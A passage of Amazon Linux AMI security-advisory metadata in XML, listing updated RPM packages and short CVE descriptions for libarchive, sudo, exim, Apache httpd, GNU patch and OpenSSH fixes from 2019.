arch="x86_64"><filename>Packages/sssd-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-devel-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libsss_idmap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-devel-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libipa_hbac" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libipa_hbac-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-debuginfo" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-debuginfo-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libipa_hbac-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libipa_hbac-devel-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libsss_sudo" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_sudo-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libsss_nss_idmap-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="python27-sss-murmur" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-murmur-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libsss_autofs" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_autofs-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-common-pac" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-pac-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-ldap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ldap-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-client" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-client-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="python27-libipa_hbac" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libipa_hbac-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="python27-sss" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5-common" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-common-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-ad" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ad-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-dbus" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-dbus-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libsss_certmap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_certmap-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-proxy" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-proxy-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-common" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libsss_certmap-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_certmap-devel-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="python27-sssdconfig" version="1.16.4" release="21.25.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-sssdconfig-1.16.4-21.25.amzn1.noarch.rpm</filename></package><package name="libsss_idmap-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-devel-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libsss_sudo" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_sudo-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-winbind-idmap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-winbind-idmap-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-ldap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ldap-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-krb5-common" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-common-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-dbus" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-dbus-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-common-pac" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-pac-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-devel-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libsss_certmap-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_certmap-devel-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-devel-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libsss_nss_idmap-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-common" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libsss_autofs" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_autofs-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-tools" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-tools-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-ipa" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ipa-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-ad" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ad-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="python27-sss" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libsss_idmap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libipa_hbac" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-client" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-client-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libipa_hbac-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-devel-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-proxy" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-proxy-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-debuginfo" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-debuginfo-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libsss_certmap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_certmap-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libsss_idmap-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-devel-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="python27-libipa_hbac" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libipa_hbac-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-krb5" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-devel-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="python27-sss-murmur" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-murmur-1.16.4-21.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1308</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1308: medium priority package update for libarchive</title><issued date="2019-10-08 21:22:00" /><updated date="2019-10-09 23:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-1000020:
libarchive version commit 5a98dcf8a86364b3c2c469c85b93647dfb139961 onwards (version v2.8.0 onwards) contains a CWE-835 Loop with Unreachable Exit Condition (&#039;Infinite Loop&#039;) vulnerability in ISO9660 parser, archive_read_support_format_iso9660.c, read_CE()/parse_rockridge() that can result in DoS by infinite loop. This attack appears to be exploitable via the victim opening a specially crafted ISO9660 file.
99999:
CVE-2019-1000020 libarchive: Infinite recursion in archive_read_support_format_iso9660.c resulting in denial of service
CVE-2019-1000019:
libarchive version commit bf9aec176c6748f0ee7a678c5f9f9555b9a757c1 onwards (release v3.0.2 onwards) contains a CWE-125 Out-of-bounds Read vulnerability in 7zip decompression, archive_read_support_format_7zip.c, header_bytes() that can result in a crash (denial of service). This attack appears to be exploitable via the victim opening a specially crafted 7zip file.
99999:
CVE-2019-1000019 libarchive: Out of bounds read in archive_read_support_format_7zip.c resulting in a denial of service
CVE-2018-1000878:
libarchive version commit 416694915449219d505531b1096384f3237dd6cc onwards (release v3.1.0 onwards) contains a CWE-416 Use After Free vulnerability in RAR decoder, libarchive/archive_read_support_format_rar.c that can result in Crash/DoS, it is unknown if RCE is possible. This attack appear to be exploitable via the victim must open a specially crafted RAR archive.
99999:
CVE-2018-1000878 libarchive: Use after free in RAR decoder resulting in a denial of service
CVE-2018-1000877:
libarchive version commit 416694915449219d505531b1096384f3237dd6cc onwards (release v3.1.0 onwards) contains a CWE-415 Double Free vulnerability in RAR decoder - libarchive/archive_read_support_format_rar.c, parse_codes(), realloc(rar-&gt;lzss.window, new_size) with new_size = 0 that can result in Crash/DoS. This attack appear to be exploitable via the victim must open a specially crafted RAR archive.
99999:
CVE-2018-1000877 libarchive: Double free in RAR decoder resulting in a denial of service
CVE-2017-14503:
libarchive 3.3.2 suffers from an out-of-bounds read within lha_read_data_none() in archive_read_support_format_lha.c when extracting a specially crafted lha archive, related to lha_crc16.
99999:
CVE-2017-14503 libarchive: Out-of-bounds read in lha_read_data_none
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14503" title="" id="CVE-2017-14503" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000877" title="" id="CVE-2018-1000877" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000878" title="" id="CVE-2018-1000878" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1000019" title="" id="CVE-2019-1000019" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1000020" title="" id="CVE-2019-1000020" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bsdcpio" version="3.1.2" release="12.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/bsdcpio-3.1.2-12.12.amzn1.x86_64.rpm</filename></package><package name="libarchive" version="3.1.2" release="12.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libarchive-3.1.2-12.12.amzn1.x86_64.rpm</filename></package><package name="libarchive-devel" version="3.1.2" release="12.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libarchive-devel-3.1.2-12.12.amzn1.x86_64.rpm</filename></package><package name="libarchive-debuginfo" version="3.1.2" release="12.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libarchive-debuginfo-3.1.2-12.12.amzn1.x86_64.rpm</filename></package><package name="bsdtar" version="3.1.2" release="12.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/bsdtar-3.1.2-12.12.amzn1.x86_64.rpm</filename></package><package name="bsdcpio" version="3.1.2" release="12.12.amzn1" epoch="0" arch="i686"><filename>Packages/bsdcpio-3.1.2-12.12.amzn1.i686.rpm</filename></package><package name="libarchive" version="3.1.2" release="12.12.amzn1" epoch="0" arch="i686"><filename>Packages/libarchive-3.1.2-12.12.amzn1.i686.rpm</filename></package><package name="libarchive-debuginfo" version="3.1.2" release="12.12.amzn1" epoch="0" arch="i686"><filename>Packages/libarchive-debuginfo-3.1.2-12.12.amzn1.i686.rpm</filename></package><package name="bsdtar" version="3.1.2" release="12.12.amzn1" epoch="0" arch="i686"><filename>Packages/bsdtar-3.1.2-12.12.amzn1.i686.rpm</filename></package><package name="libarchive-devel" version="3.1.2" release="12.12.amzn1" epoch="0" arch="i686"><filename>Packages/libarchive-devel-3.1.2-12.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1309</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1309: important priority package update for sudo</title><issued date="2019-10-12 15:49:00" /><updated date="2019-10-14 17:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-14287:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287" title="" id="CVE-2019-14287" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sudo-devel" version="1.8.6p3" release="29.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-devel-1.8.6p3-29.28.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="29.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.8.6p3-29.28.amzn1.x86_64.rpm</filename></package><package name="sudo" version="1.8.6p3" release="29.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.8.6p3-29.28.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="29.28.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.8.6p3-29.28.amzn1.i686.rpm</filename></package><package name="sudo-devel" version="1.8.6p3" release="29.28.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-devel-1.8.6p3-29.28.amzn1.i686.rpm</filename></package><package name="sudo" version="1.8.6p3" release="29.28.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.8.6p3-29.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1310</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1310: critical priority package update for exim</title><issued date="2019-10-18 23:22:00" /><updated date="2019-10-24 21:31:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-16928:
Exim 4.92 through 4.92.2 allows remote code execution, a different vulnerability than CVE-2019-15846. There is a heap-based buffer overflow in string_vformat in string.c involving a long EHLO command.
99999:
CVE-2019-16928 exim: remotely triggerable buffer overflow in string_vformat()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16928" title="" id="CVE-2019-16928" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-debuginfo" version="4.92" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.25.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.25.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.92" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.92-1.25.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.25.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.25.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.25.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.25.amzn1.i686.rpm</filename></package><package name="exim" version="4.92" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.92-1.25.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.92-1.25.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.92-1.25.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.92" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.92-1.25.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1311</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1311: medium priority package update for httpd24</title><issued date="2019-10-18 23:22:00" /><updated date="2019-10-24 21:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9517:
Some HTTP/2 implementations are vulnerable to unconstrained interal data buffering, potentially leading to a denial of service. The attacker opens the HTTP/2 window so the peer can send without constraint; however, they leave the TCP window closed so the peer cannot actually write (many of) the bytes on the wire. The attacker then sends a stream of requests for a large response object. Depending on how the servers queue the responses, this can consume excess memory, CPU, or both.
99999:
CVE-2019-9517 HTTP/2: request for large response leads to denial of service
CVE-2019-10098:
A vulnerability was discovered in Apache httpd, in mod_rewrite. Certain self-referential mod_rewrite rules could be fooled by encoded newlines, causing them to redirect to an unexpected location. An attacker could abuse this flaw in a phishing attack or as part of a client-side attack on browsers.
99999:
CVE-2019-10098 httpd: mod_rewrite potential open redirect
CVE-2019-10097:
A vulnerability was discovered in Apache httpd, in mod_remoteip. A trusted proxy using the &quot;PROXY&quot; protocol could send specially crafted headers that can cause httpd to experience a stack buffer overflow or NULL pointer dereference, leading to a crash or other potential consequences.\n\nThis issue could only be exploited by configured trusted intermediate proxy servers. HTTP clients such as browsers could not exploit the vulnerability.
99999:
CVE-2019-10097 httpd: null-pointer dereference in mod_remoteip
CVE-2019-10092:
A cross-site scripting vulnerability was found in Apache httpd, affecting the mod_proxy error page. Under certain circumstances, a crafted link could inject content into the HTML displayed in the error page, potentially leading to client-side exploitation.
99999:
CVE-2019-10092 httpd: limited cross-site scripting in mod_proxy error page
CVE-2019-10082:
A read-after-free vulnerability was discovered in Apache httpd, in mod_http2. A specially crafted http/2 client session could cause the server to read memory that was previously freed during connection shutdown, potentially leading to a crash.
99999:
CVE-2019-10082 httpd: read-after-free in h2 connection shutdown
CVE-2019-10081:
A vulnerability was found in Apache httpd, in mod_http2. Under certain circumstances, HTTP/2 early pushes could lead to memory corruption, causing a server to crash.
99999:
CVE-2019-10081 httpd: memory corruption on early pushes
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10081" title="" id="CVE-2019-10081" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10082" title="" id="CVE-2019-10082" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10092" title="" id="CVE-2019-10092" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10097" title="" id="CVE-2019-10097" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10098" title="" id="CVE-2019-10098" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9517" title="" id="CVE-2019-9517" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_ssl" version="2.4.41" release="1.88.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.41-1.88.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.41" release="1.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.41-1.88.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.41" release="1.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.41-1.88.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.41" release="1.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.41-1.88.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.41" release="1.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.41-1.88.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.41" release="1.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.41-1.88.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.41" release="1.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.41-1.88.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.41" release="1.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.41-1.88.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.41" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.41-1.88.amzn1.noarch.rpm</filename></package><package name="mod24_proxy_html" version="2.4.41" release="1.88.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.41-1.88.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.41" release="1.88.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.41-1.88.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.41" release="1.88.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.41-1.88.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.41" release="1.88.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.41-1.88.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.41" release="1.88.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.41-1.88.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.41" release="1.88.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.41-1.88.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.41" release="1.88.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.41-1.88.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.41" release="1.88.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.41-1.88.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.41" release="1.88.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.41-1.88.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.41" release="1.88.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.41-1.88.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1312</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1312: important priority package update for patch</title><issued date="2019-10-18 23:22:00" /><updated date="2019-11-07 00:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-13638:
GNU patch through 2.7.6 is vulnerable to OS shell command injection that can be exploited by opening a crafted patch file that contains an ed style diff payload with shell metacharacters. The ed editor does not need to be present on the vulnerable system. This is different from CVE-2018-1000156.
99999:
CVE-2019-13638 patch: OS shell command injection when processing crafted patch files
CVE-2018-6952:
A double-free flaw was found in the way the patch utility processed patch files. An attacker could potentially use this flaw to crash the patch utility by tricking it into processing crafted patches.
99999:
CVE-2018-6952 patch: Double free of memory in pch.c:another_hunk() causes a crash
CVE-2018-20969:
do_ed_script in pch.c in GNU patch through 2.7.6 does not block strings beginning with a ! character. NOTE: this is the same commit as for CVE-2019-13638, but the ! syntax is specific to ed, and is unrelated to a shell metacharacter.
99999:
CVE-2018-20969 patch: do_ed_script in pch.c does not block strings beginning with a ! character
CVE-2016-10713:
A heap-based out-of-bounds read flaw was found in the way the patch utility parsed patch files. An attacker could potentially use this flaw to crash the patch utility by tricking it into processing crafted patch files.
99999:
CVE-2016-10713 patch: Out-of-bounds access in pch_write_line function in pch.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10713" title="" id="CVE-2016-10713" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20969" title="" id="CVE-2018-20969" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6952" title="" id="CVE-2018-6952" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13638" title="" id="CVE-2019-13638" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="patch" version="2.7.1" release="12.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/patch-2.7.1-12.14.amzn1.x86_64.rpm</filename></package><package name="patch-debuginfo" version="2.7.1" release="12.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/patch-debuginfo-2.7.1-12.14.amzn1.x86_64.rpm</filename></package><package name="patch" version="2.7.1" release="12.14.amzn1" epoch="0" arch="i686"><filename>Packages/patch-2.7.1-12.14.amzn1.i686.rpm</filename></package><package name="patch-debuginfo" version="2.7.1" release="12.14.amzn1" epoch="0" arch="i686"><filename>Packages/patch-debuginfo-2.7.1-12.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1313</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1313: medium priority package update for openssh</title><issued date="2019-10-28 17:02:00" /><updated date="2019-10-30 20:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-6111:
An issue was discovered in OpenSSH 7.9. Due to the scp implementation being derived from 1983 rcp, the server chooses which files/directories are sent to the client. However, the scp client only performs cursory validation of the object name returned (only directory traversal attacks are prevented). A malicious scp server (or Man-in-The-Middle attacker) can overwrite arbitrary files in the scp client target directory. If recursive operation (-r) is performed, the server can manipulate subdirectories as well (for example, to overwrite the .ssh/authorized_keys file).
1666127:
CVE-2019-6111 openssh: Improper validation of object names allows malicious server to overwrite files via scp client
CVE-2019-6109:
